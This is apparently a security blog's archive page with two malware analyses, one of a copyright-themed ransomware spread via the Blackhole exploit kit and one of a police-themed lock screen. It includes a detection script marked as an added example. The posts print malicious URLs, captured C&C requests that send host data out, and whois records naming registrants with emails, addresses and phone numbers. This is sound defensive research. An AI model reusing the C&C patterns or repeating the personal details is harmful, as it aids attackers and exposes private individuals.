Tag Archive for 'scareware'

Ransomware Gets Professional, Targeting Switzerland, Germany And Austria

In March I blogged about a ransomware which has been targeting various countries, locking down the victim's computer due to “Child Porn and Terrorism”.

This week I spotted another ransomware campaign that is targeting Swiss, German and Austrian internet users. This time the criminals seem to use a different schema to lock down the victim's computer: violation of local copyright law.

*** Infection vector ***
The infection vector is a well-known drive-by exploit kit called “Blackhole”. It is sold in underground forums and used by various criminal groups to infect computers “on the fly” by (ab)using one or more security vulnerabilities in the victim's web browser (or a third-party plug-in like Adobe Flash Player, Adobe Reader or Java). In this case a Blackhole exploit kit located at pampa04.com was involved in spreading the ransomware:

hXXp://pampa04.com/main.php?page=d73d9795c56f8f33 [landing page]
-> hXXp://pampa04.com/data/ap2.php [JavaScript loading exploits]
--> hXXp://pampa04.com/Edu.jar [Java exploit]
---> hXXp://pampa04.com/w.php?f=5e91c&e=0 [Payload]

If the Java version installed on the victim's computer is not up to date (unpatched), the downloaded jar file (Edu.jar) exploits a well-known vulnerability in Java, which triggers the download of the payload (Trojan) and finally executes it to infect the computer. The payload had a detection rate of 4/42 on VirusTotal:

Filename: info.exe
MD5: 56f4d5837af32b12069576fae8c2b3c5
File size: 312.5 KB
AV-detection rate: 4/42

*** Analysis of the payload (Ransomware) ***
If the exploitation of the victim's computer is successful, the Ransomware installs itself into the Application Data directory of the current user:

C:\Documents and Settings\Christoph\Application Data\itunes_service01.exe

Once the computer has been infected, the Ransomware tries to contact its Command&Control server (C&C) located at joonwalker.com using HTTP GET:

hXXp://joonwalker.com/unser1/redirector/redirector.php
hXXp://joonwalker.com/unser1/universalbezahlung/schweiz/index.php
hXXp://joonwalker.com/ajax/libs/jquery/1.3.2/jquery.min.js
hXXp://joonwalker.com/unser1/universalbezahlung/schweiz/bg_ch.gif
hXXp://joonwalker.com/unser1/universalbezahlung/schweiz/js/keyboard.js

The landing URL redirector.php determines the location of the infected computer using GeoIP and redirects the request to the matching site with an HTTP 302 Found, for example:

hXXp://joonwalker.com/unser1/universalbezahlung/schweiz/index.php

While investigating this C&C I found several other URLs which show that this Ransomware is targeting not only Switzerland but also several other countries (the copyright association named on each country's page is given in brackets):

Switzerland (SUISA): hXXp://joonwalker.com/unser1/universalbezahlung/schweiz/
Germany (GVU): hXXp://joonwalker.com/unser1/universalbezahlung/deutschland/
Austria (AKM): hXXp://joonwalker.com/unser1/universalbezahlung/oesterreich/
United Kingdom (PRS): hXXp://joonwalker.com/unser1/universalbezahlung/england/
France (SACEM): hXXp://joonwalker.com/unser1/universalbezahlung/frankreich/
Netherlands (BUMA-STEMRA): hXXp://joonwalker.com/unser1/universalbezahlung/holland/

What stands out quickly when taking a look at these URLs is that they are all written in German, so it looks like the cybercriminal behind this ransomware campaign is a German-speaking person. While analysing all these different URLs I noticed that the cybercriminal has spent quite some time preparing them. The language seems to be well written (I couldn't find as many spelling errors as I would have expected). In addition, it appears that the cybercriminal tried to get intel about where the victim can buy paysafecard (for the record: the victim has to pay a country-specific amount of money to the cybercriminal using paysafecard to get his computer unlocked) and which association is tracking copyright infringement in the specific country. For example, he tells Swiss victims that they can obtain paysafecard at federal railway (SBB) stations and at MediaMarkt (a German-based electronics discounter).

Another interesting finding is the fact that the Ransomware comes with an additional Trojan called Aldi Bot. Aldi Bot steals banking information (similar to ZeuS and SpyEye) and has some additional DDoS functionality.

Fortunately, Aldi Bot C&C traffic is very easy to identify because this Trojan uses a specific User-Agent, “Aldi Bot FTW! :D”. In this case the Aldi Bot C&C is located on the same server/domain as the Ransomware itself, but on a different URI:

GET /unser1/universalpanel/gate.php?hwid=XXX&pc=XXX&localip=XXX&winver=XXX HTTP/1.1
User-Agent: Aldi Bot FTW! :D
Host: joonwalker.com

*** Command&Control Infrastructure ***

The domain name used by this Ransomware and Aldi Bot points to a Russian web hosting provider called “Amtel Svyaz”:

$ dig +short joonwalker.com
195.208.185.99

$ whois 195.208.185.99
inetnum: 195.208.184.0 - 195.208.187.255
netname: AMTEL-SVYAZ
descr: “Amtel Svyaz” ZAO
country: RU
org: ORG-AZ2-RIPE
admin-c: AG12682-RIPE
tech-c: AG12682-RIPE
tech-c: AG8732-RIPE
status: ASSIGNED PA
mnt-by: ROSNIIROS-MNT
mnt-domains: AMTELSV-MNT
mnt-routes: ROSNIIROS-MNT
source: RIPE # Filtered
[...]

The domain name joonwalker.com is registered through a Russian-based domain registrar called Regtime Ltd (also known as webnames.ru):

Domain name: joonwalker.com

Name servers:
ns1.nameself.com
ns2.nameself.com

Registrar: Regtime Ltd.
Creation date: 2012-04-29
Expiration date: 2013-04-29

Registrant:
Huth Matthias
Email: huthmatthias@yahoo.de
Organization: Huth Matthias
Address: Bremenstrasse 12
City: Gladbeck
State: NRW
ZIP: 45964
Country: DE
Phone: +49.3051236167
Fax: +49.3051236169

According to whois, the holder of this domain is “Huth Matthias”, who has registered various other domain names this year.


All these domain names can be considered malicious and should be blocked at your network edge.
To prevent this kind of infection, ensure that your operating system as well as all installed applications (especially browser plug-ins) are up to date.

*** Further reading ***

Scareware Locks Down Computer Due To Child Porn and Terrorism

Recently, my sandbox came across a scareware sample that locks down the victim's computer due to “terrorism and child pornography”. The malware is detected by some AV vendors as “Win32/LockScreen”.

The schema is pretty simple: the criminals try to infect computers with scareware (e.g. through drive-by exploits). As soon as the computer is infected, the malware locks down the machine so that the user can no longer log in. The malware then displays a message telling the user that law enforcement agency XY found child pornography on the victim's computer and that his computer was used to send out “spam mails with terrorist motives”:

Attention!!!

This operating system is locked due to the violation of the laws of the United Kingdom! Following violations were detected:
Your IP address was used to visit websites containing pornography, child pornography, zoopillia and child abuse. Your computer also contains video files with Pornographic content, elements of violence and child pornograhpy! Spam-messages with terrorist motives were also sent from your computer

This computer lock is aimed to stop your illegal activity.

The message as displayed to the victim (screenshot):

What is interesting about this scareware is its dependency on the geo-location of the victim's computer. Before the scareware displays the message shown above, it contacts a central botnet command and control server (C&C) located in Ukraine (188.190.99.174 – AS197145 Infium LTD) using HTTP:

X-188.190.099.174.00080: GET /loc/gate.php?getpic=getpic HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSlE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: 188.190.99.174
Connection: Keep-Alive

188.190.099.174.00080-X: HTTP/1.1 200 OK
Date: Wed, XX Feb 2012 XX:XX:XX
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 32
Connection: close
Content-Type: text/html; charset=UTF-8

http://188.190.99.174/pic/DE.bmp

In the first request the malware contacts the C&C using a parameter called “getpic”. The C&C responds with a URL pointing to the image the malware should display to the victim. The malware then follows the URL and downloads the BMP file:

GET /pic/DE.bmp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSlE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: 188.190.99.174
Cache-Control: no-cache

Then the malware determines the IP address of the victim's computer by using the parameter “getip”:

X-188.190.099.174.00080: GET /loc/gate.php?getip=getip HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSlE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: 188.190.99.174
Connection: Keep-Alive

Afterwards the malware displays a “lock screen” to the user, built from the C&C's response (the IP address) and the image file downloaded before.
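The C&C patterns described in both posts on this page (the Aldi Bot User-Agent and /unser1/ URIs on joonwalker.com in the ransomware post above, and the gate.php?getpic/getip and /pic/XX.bmp requests to 188.190.99.174 described here) can be turned into a simple proxy-log check. The following Python script is an added example and not code from the original posts; the space-separated log layout and the sample lines are constructed for it.

```python
import re

# Indicators quoted in the two posts above; the log layout and the sample
# lines below are constructed for this example.
ALDI_BOT_UA = "Aldi Bot FTW! :D"
KNOWN_C2 = {"joonwalker.com", "188.190.99.174"}
URI_RULES = [
    ("aldibot-gate", re.compile(r"/universalpanel/gate\.php\?.*\bhwid=", re.I)),
    ("ransomware-payment-page", re.compile(r"/unser1/universalbezahlung/", re.I)),
    ("lockscreen-gate", re.compile(r"/loc/gate\.php\?(getpic|getip)=", re.I)),
    ("lockscreen-image", re.compile(r"/pic/[A-Z]{2}\.bmp$", re.I)),
]

# Hypothetical proxy log layout: <client_ip> <method> <host> <uri> "<user-agent>"
LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)"$')

def inspect(line):
    """Return the names of all indicators a single log line matches."""
    m = LINE_RE.match(line.strip())
    if not m:
        return []  # unparsable line: skip it rather than abort the scan
    _client, _method, host, uri, ua = m.groups()
    hits = []
    if ua == ALDI_BOT_UA:  # exact match: the bot hard-codes this string
        hits.append("aldibot-useragent")
    if host.lower() in KNOWN_C2:
        hits.append("known-c2-host")
    hits.extend(name for name, rx in URI_RULES if rx.search(uri))
    return hits

def scan(lines):
    """Map every client that tripped an indicator to its distinct hits, in order."""
    report = {}
    for line in lines:
        hits = inspect(line)
        if hits:
            seen = report.setdefault(line.split(" ", 1)[0], [])
            seen.extend(h for h in hits if h not in seen)
    return report

# Constructed sample traffic: one infected client (10.0.0.5), one clean one.
SAMPLE_LOG = [
    '10.0.0.5 GET joonwalker.com /unser1/redirector/redirector.php "Mozilla/4.0"',
    '10.0.0.5 GET joonwalker.com /unser1/universalpanel/gate.php?hwid=1&pc=A&localip=10.0.0.5&winver=XP "Aldi Bot FTW! :D"',
    '10.0.0.5 GET 188.190.99.174 /loc/gate.php?getpic=getpic "Mozilla/4.0 (compatible; MSIE 6.0)"',
    '10.0.0.5 GET 188.190.99.174 /pic/DE.bmp "Mozilla/4.0 (compatible; MSIE 6.0)"',
    '10.0.0.9 GET example.com /index.html "Mozilla/5.0"',
]
```

Running scan(SAMPLE_LOG) reports only 10.0.0.5, with all five indicators in the order they were first seen; the clean client 10.0.0.9 does not appear.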

The interesting part is that you can identify the countries targeted by this attack by guessing the file names on the botnet controller (country codes). So far, I've identified the following countries/URLs:

Location: http://188.190.99.174/pic/AT.bmp
Country: Austria (AT)
Agency: BUNDESPOLIZEI
Domain name: landes-kriminalt.net

Location: http://188.190.99.174/pic/DE.bmp
Country: Germany (DE)
Agency: BUNDESPOLIZEI
Domain name: landes-kriminalt.net

Location: http://188.190.99.174/pic/GB.bmp
Country: United Kingdom (GB)
Agency: METROPOLITAN POLICE
Domain name: policemetropolitan.org

Location: http://188.190.99.174/pic/FR.bmp
Country: France (FR)
Agency: Gendarmerie nationale
Domain name: n-p-f.org

Location: http://188.190.99.174/pic/IT.bmp
Country: Italy (IT)
Agency: Guardia di Finanza
Domain name: it-polizia.org

Location: http://188.190.99.174/pic/ES.bmp
Country: Spain (ES)
Agency: La policia ESPANOLA
Domain name: lapoliciaespanola.org

Most of the domain names mentioned above are misspelled; for example, landes-kriminalt.net is a misspelling of “Kriminalamt”, which is equivalent to the Federal Police. All mentioned domain names are registered through the registrar BIZCN (a registrar located in China):

Domain Name: LANDES-KRIMINALT.NET
Registrar: BIZCN.COM, INC.
Whois Server: whois.bizcn.com
Referral URL: http://www.bizcn.com
Name Server: NS3.CNMSN.COM
Name Server: NS4.CNMSN.COM
Status: clientDeleteProhibited
Status: clientTransferProhibited
Updated Date: 02-may-2011
Creation Date: 02-may-2011
Expiration Date: 02-may-2012

Last update of whois database: Thu, 01 Mar 2012 10:26:21 UTC
[...]

Domain name: landes-kriminalt.net

Registrant Contact:
Lilo
Petr Rublev goldenbaks@gmail.com
+7926987453 fax: +7926987453
privincealnaya 23
Tomsk Tomsk 78945
cn

Administrative Contact:
Petr Rublev goldenbaks@gmail.com
+7926987453 fax: +7926987453
privincealnaya 23
Tomsk Tomsk 78945
cn

Technical Contact:
Petr Rublev goldenbaks@gmail.com
+7926987453 fax: +7926987453
privincealnaya 23
Tomsk Tomsk 78945
cn

Billing Contact:
Petr Rublev goldenbaks@gmail.com
+7926987453 fax: +7926987453
privincealnaya 23
Tomsk Tomsk 78945
cn

DNS:
ns3.cnmsn.com
ns4.cnmsn.com

Created: 2011-05-02
Expires: 2012-05-02

What nearly all of these domain names have in common is that they have already been up for more than 8 months (Created: 2011-05-02). The same registrant has also registered a number of other domain names.


I'm asking myself how the criminals have managed not to get their domain names suspended for such a long period of time. Please note that these domain names can be considered malicious and should therefore be blocked at your network's edge (web gateway / proxy / DNS) along with the botnet controller (188.190.99.174).

The described scareware schema isn't really new; Switzerland along with several other European countries were hit by a similar attack back in 2011:
